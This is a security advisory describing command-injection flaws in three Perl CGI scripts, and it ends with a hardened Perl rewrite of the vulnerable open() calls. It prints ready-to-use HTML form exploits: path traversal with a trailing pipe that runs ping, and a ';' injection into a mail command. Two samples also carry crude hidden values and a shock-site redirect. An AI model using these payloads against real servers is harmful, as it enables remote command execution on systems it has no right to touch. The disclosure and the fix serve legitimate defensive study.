
Tammie's HUSBAND scripts ad.cgi insecure input validation vulnerability
Vulnerability

    Tammie's HUSBAND scripts

Affected

    Tammie's HUSBAND scripts

Description

    'rpc' found a number of bugs in "Scripts by Tammie's HUSBAND".
    ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure
    input validation vulnerability. Information on ad.cgi is
    available at:

        http://www.conservatives.net/atheist/scripts/index.html?ads

    Code snippet:

        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        ...
        open (INFO, "$datafile");

    Exploit:

    <html>
    <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
    <input type=submit value=run>
    </form>
    </html>

    everythingform.cgi uses a hidden field 'config' to determine
    where to read configuration data from.

    Code snippet:

        ..
        $ConfigFile = $in{config};
        ..
        open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");

    Information regarding everythingform can be found at:

        http://www.conservatives.net/atheist/scripts/index.html?everythingform

    Sample exploit:

    <form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
    <h1>everythingform.cgi exploit</h1>
    Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|">
    <input type=hidden name=Name value="fuck the religious right">
    <input type=hidden name="e-mail" value="foo@bar.net">
    <input type=hidden name=FavoriteColor value=Black>
    <input type=submit value=run>
    </form>

    simplestmail.cgi is another Perl CGI written by "Tammie's HUSBAND",
    Leif Wright.  It's available from:

        http://www.conservatives.net/atheist/scripts/index.html?simplestmail

    The code is self-explanatory:

        $youremail = $contents_by_name{'MyEmail'};
        open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

    Exploitation is straightforward:

    <html>
    <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
    Command: <input type=text name=MyEmail value=";">
    <input type=hidden name=redirect value="http://goatse.cx">
    <input type=submit name=submit value="run">
    </form>
    </html>

Solution

    Nothing yet.
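
    All three snippets pass form input to Perl's two-argument open(),
    which treats a leading or trailing "|" as a command pipe. The
    following is an added example, not code from the advisory or from
    the scripts' author, showing a hardened form of those calls; the
    values of $basedir and $mailprog, the helper names and the
    allowed-name patterns are assumptions.

```perl
#!/usr/bin/perl
# Added example: hardened versions of the open() calls quoted in the advisory.
# Paths, helper names and the allow-list patterns below are assumptions.
use strict;
use warnings;

my $basedir  = '/var/www/ads/';        # assumed data directory
my $mailprog = '/usr/sbin/sendmail';   # assumed mailer path

# Accept only a bare file name: no slashes, no leading dot, no spaces,
# and no shell or pipe characters.
sub safe_name {
    my ($name) = @_;
    return undef unless defined $name;
    return $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]{0,63})\z/ ? $1 : undef;
}

# ad.cgi / everythingform.cgi: three-argument open with an explicit '<'
# mode, so a '|' in the name is never interpreted as a command pipe.
sub open_data {
    my ($dir, $user_value) = @_;
    defined(my $name = safe_name($user_value)) or return;
    open(my $fh, '<', $dir . $name) or return;
    return $fh;
}

# simplestmail.cgi: list-form pipe open executes the mailer directly,
# without a shell, so ';' and similar characters have no special meaning.
# The address is still validated before use.
sub open_mail {
    my ($addr) = @_;
    return unless defined $addr
        && $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9.-]+\z/;
    open(my $mail, '|-', $mailprog, '-oi', '--', $addr) or return;
    return $mail;
}

# Constructed inputs: the payload shape from the advisory and a normal name.
for my $value ('../../../../bin/ping -c 5 www.foo.com|', 'banner1.txt') {
    printf "%-42s %s\n", $value,
        defined(safe_name($value)) ? 'accepted' : 'rejected';
}
```

    The allow-list rejects the traversal string outright, and the
    explicit open modes mean that a value which slipped past validation
    would be opened as a file name rather than executed.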
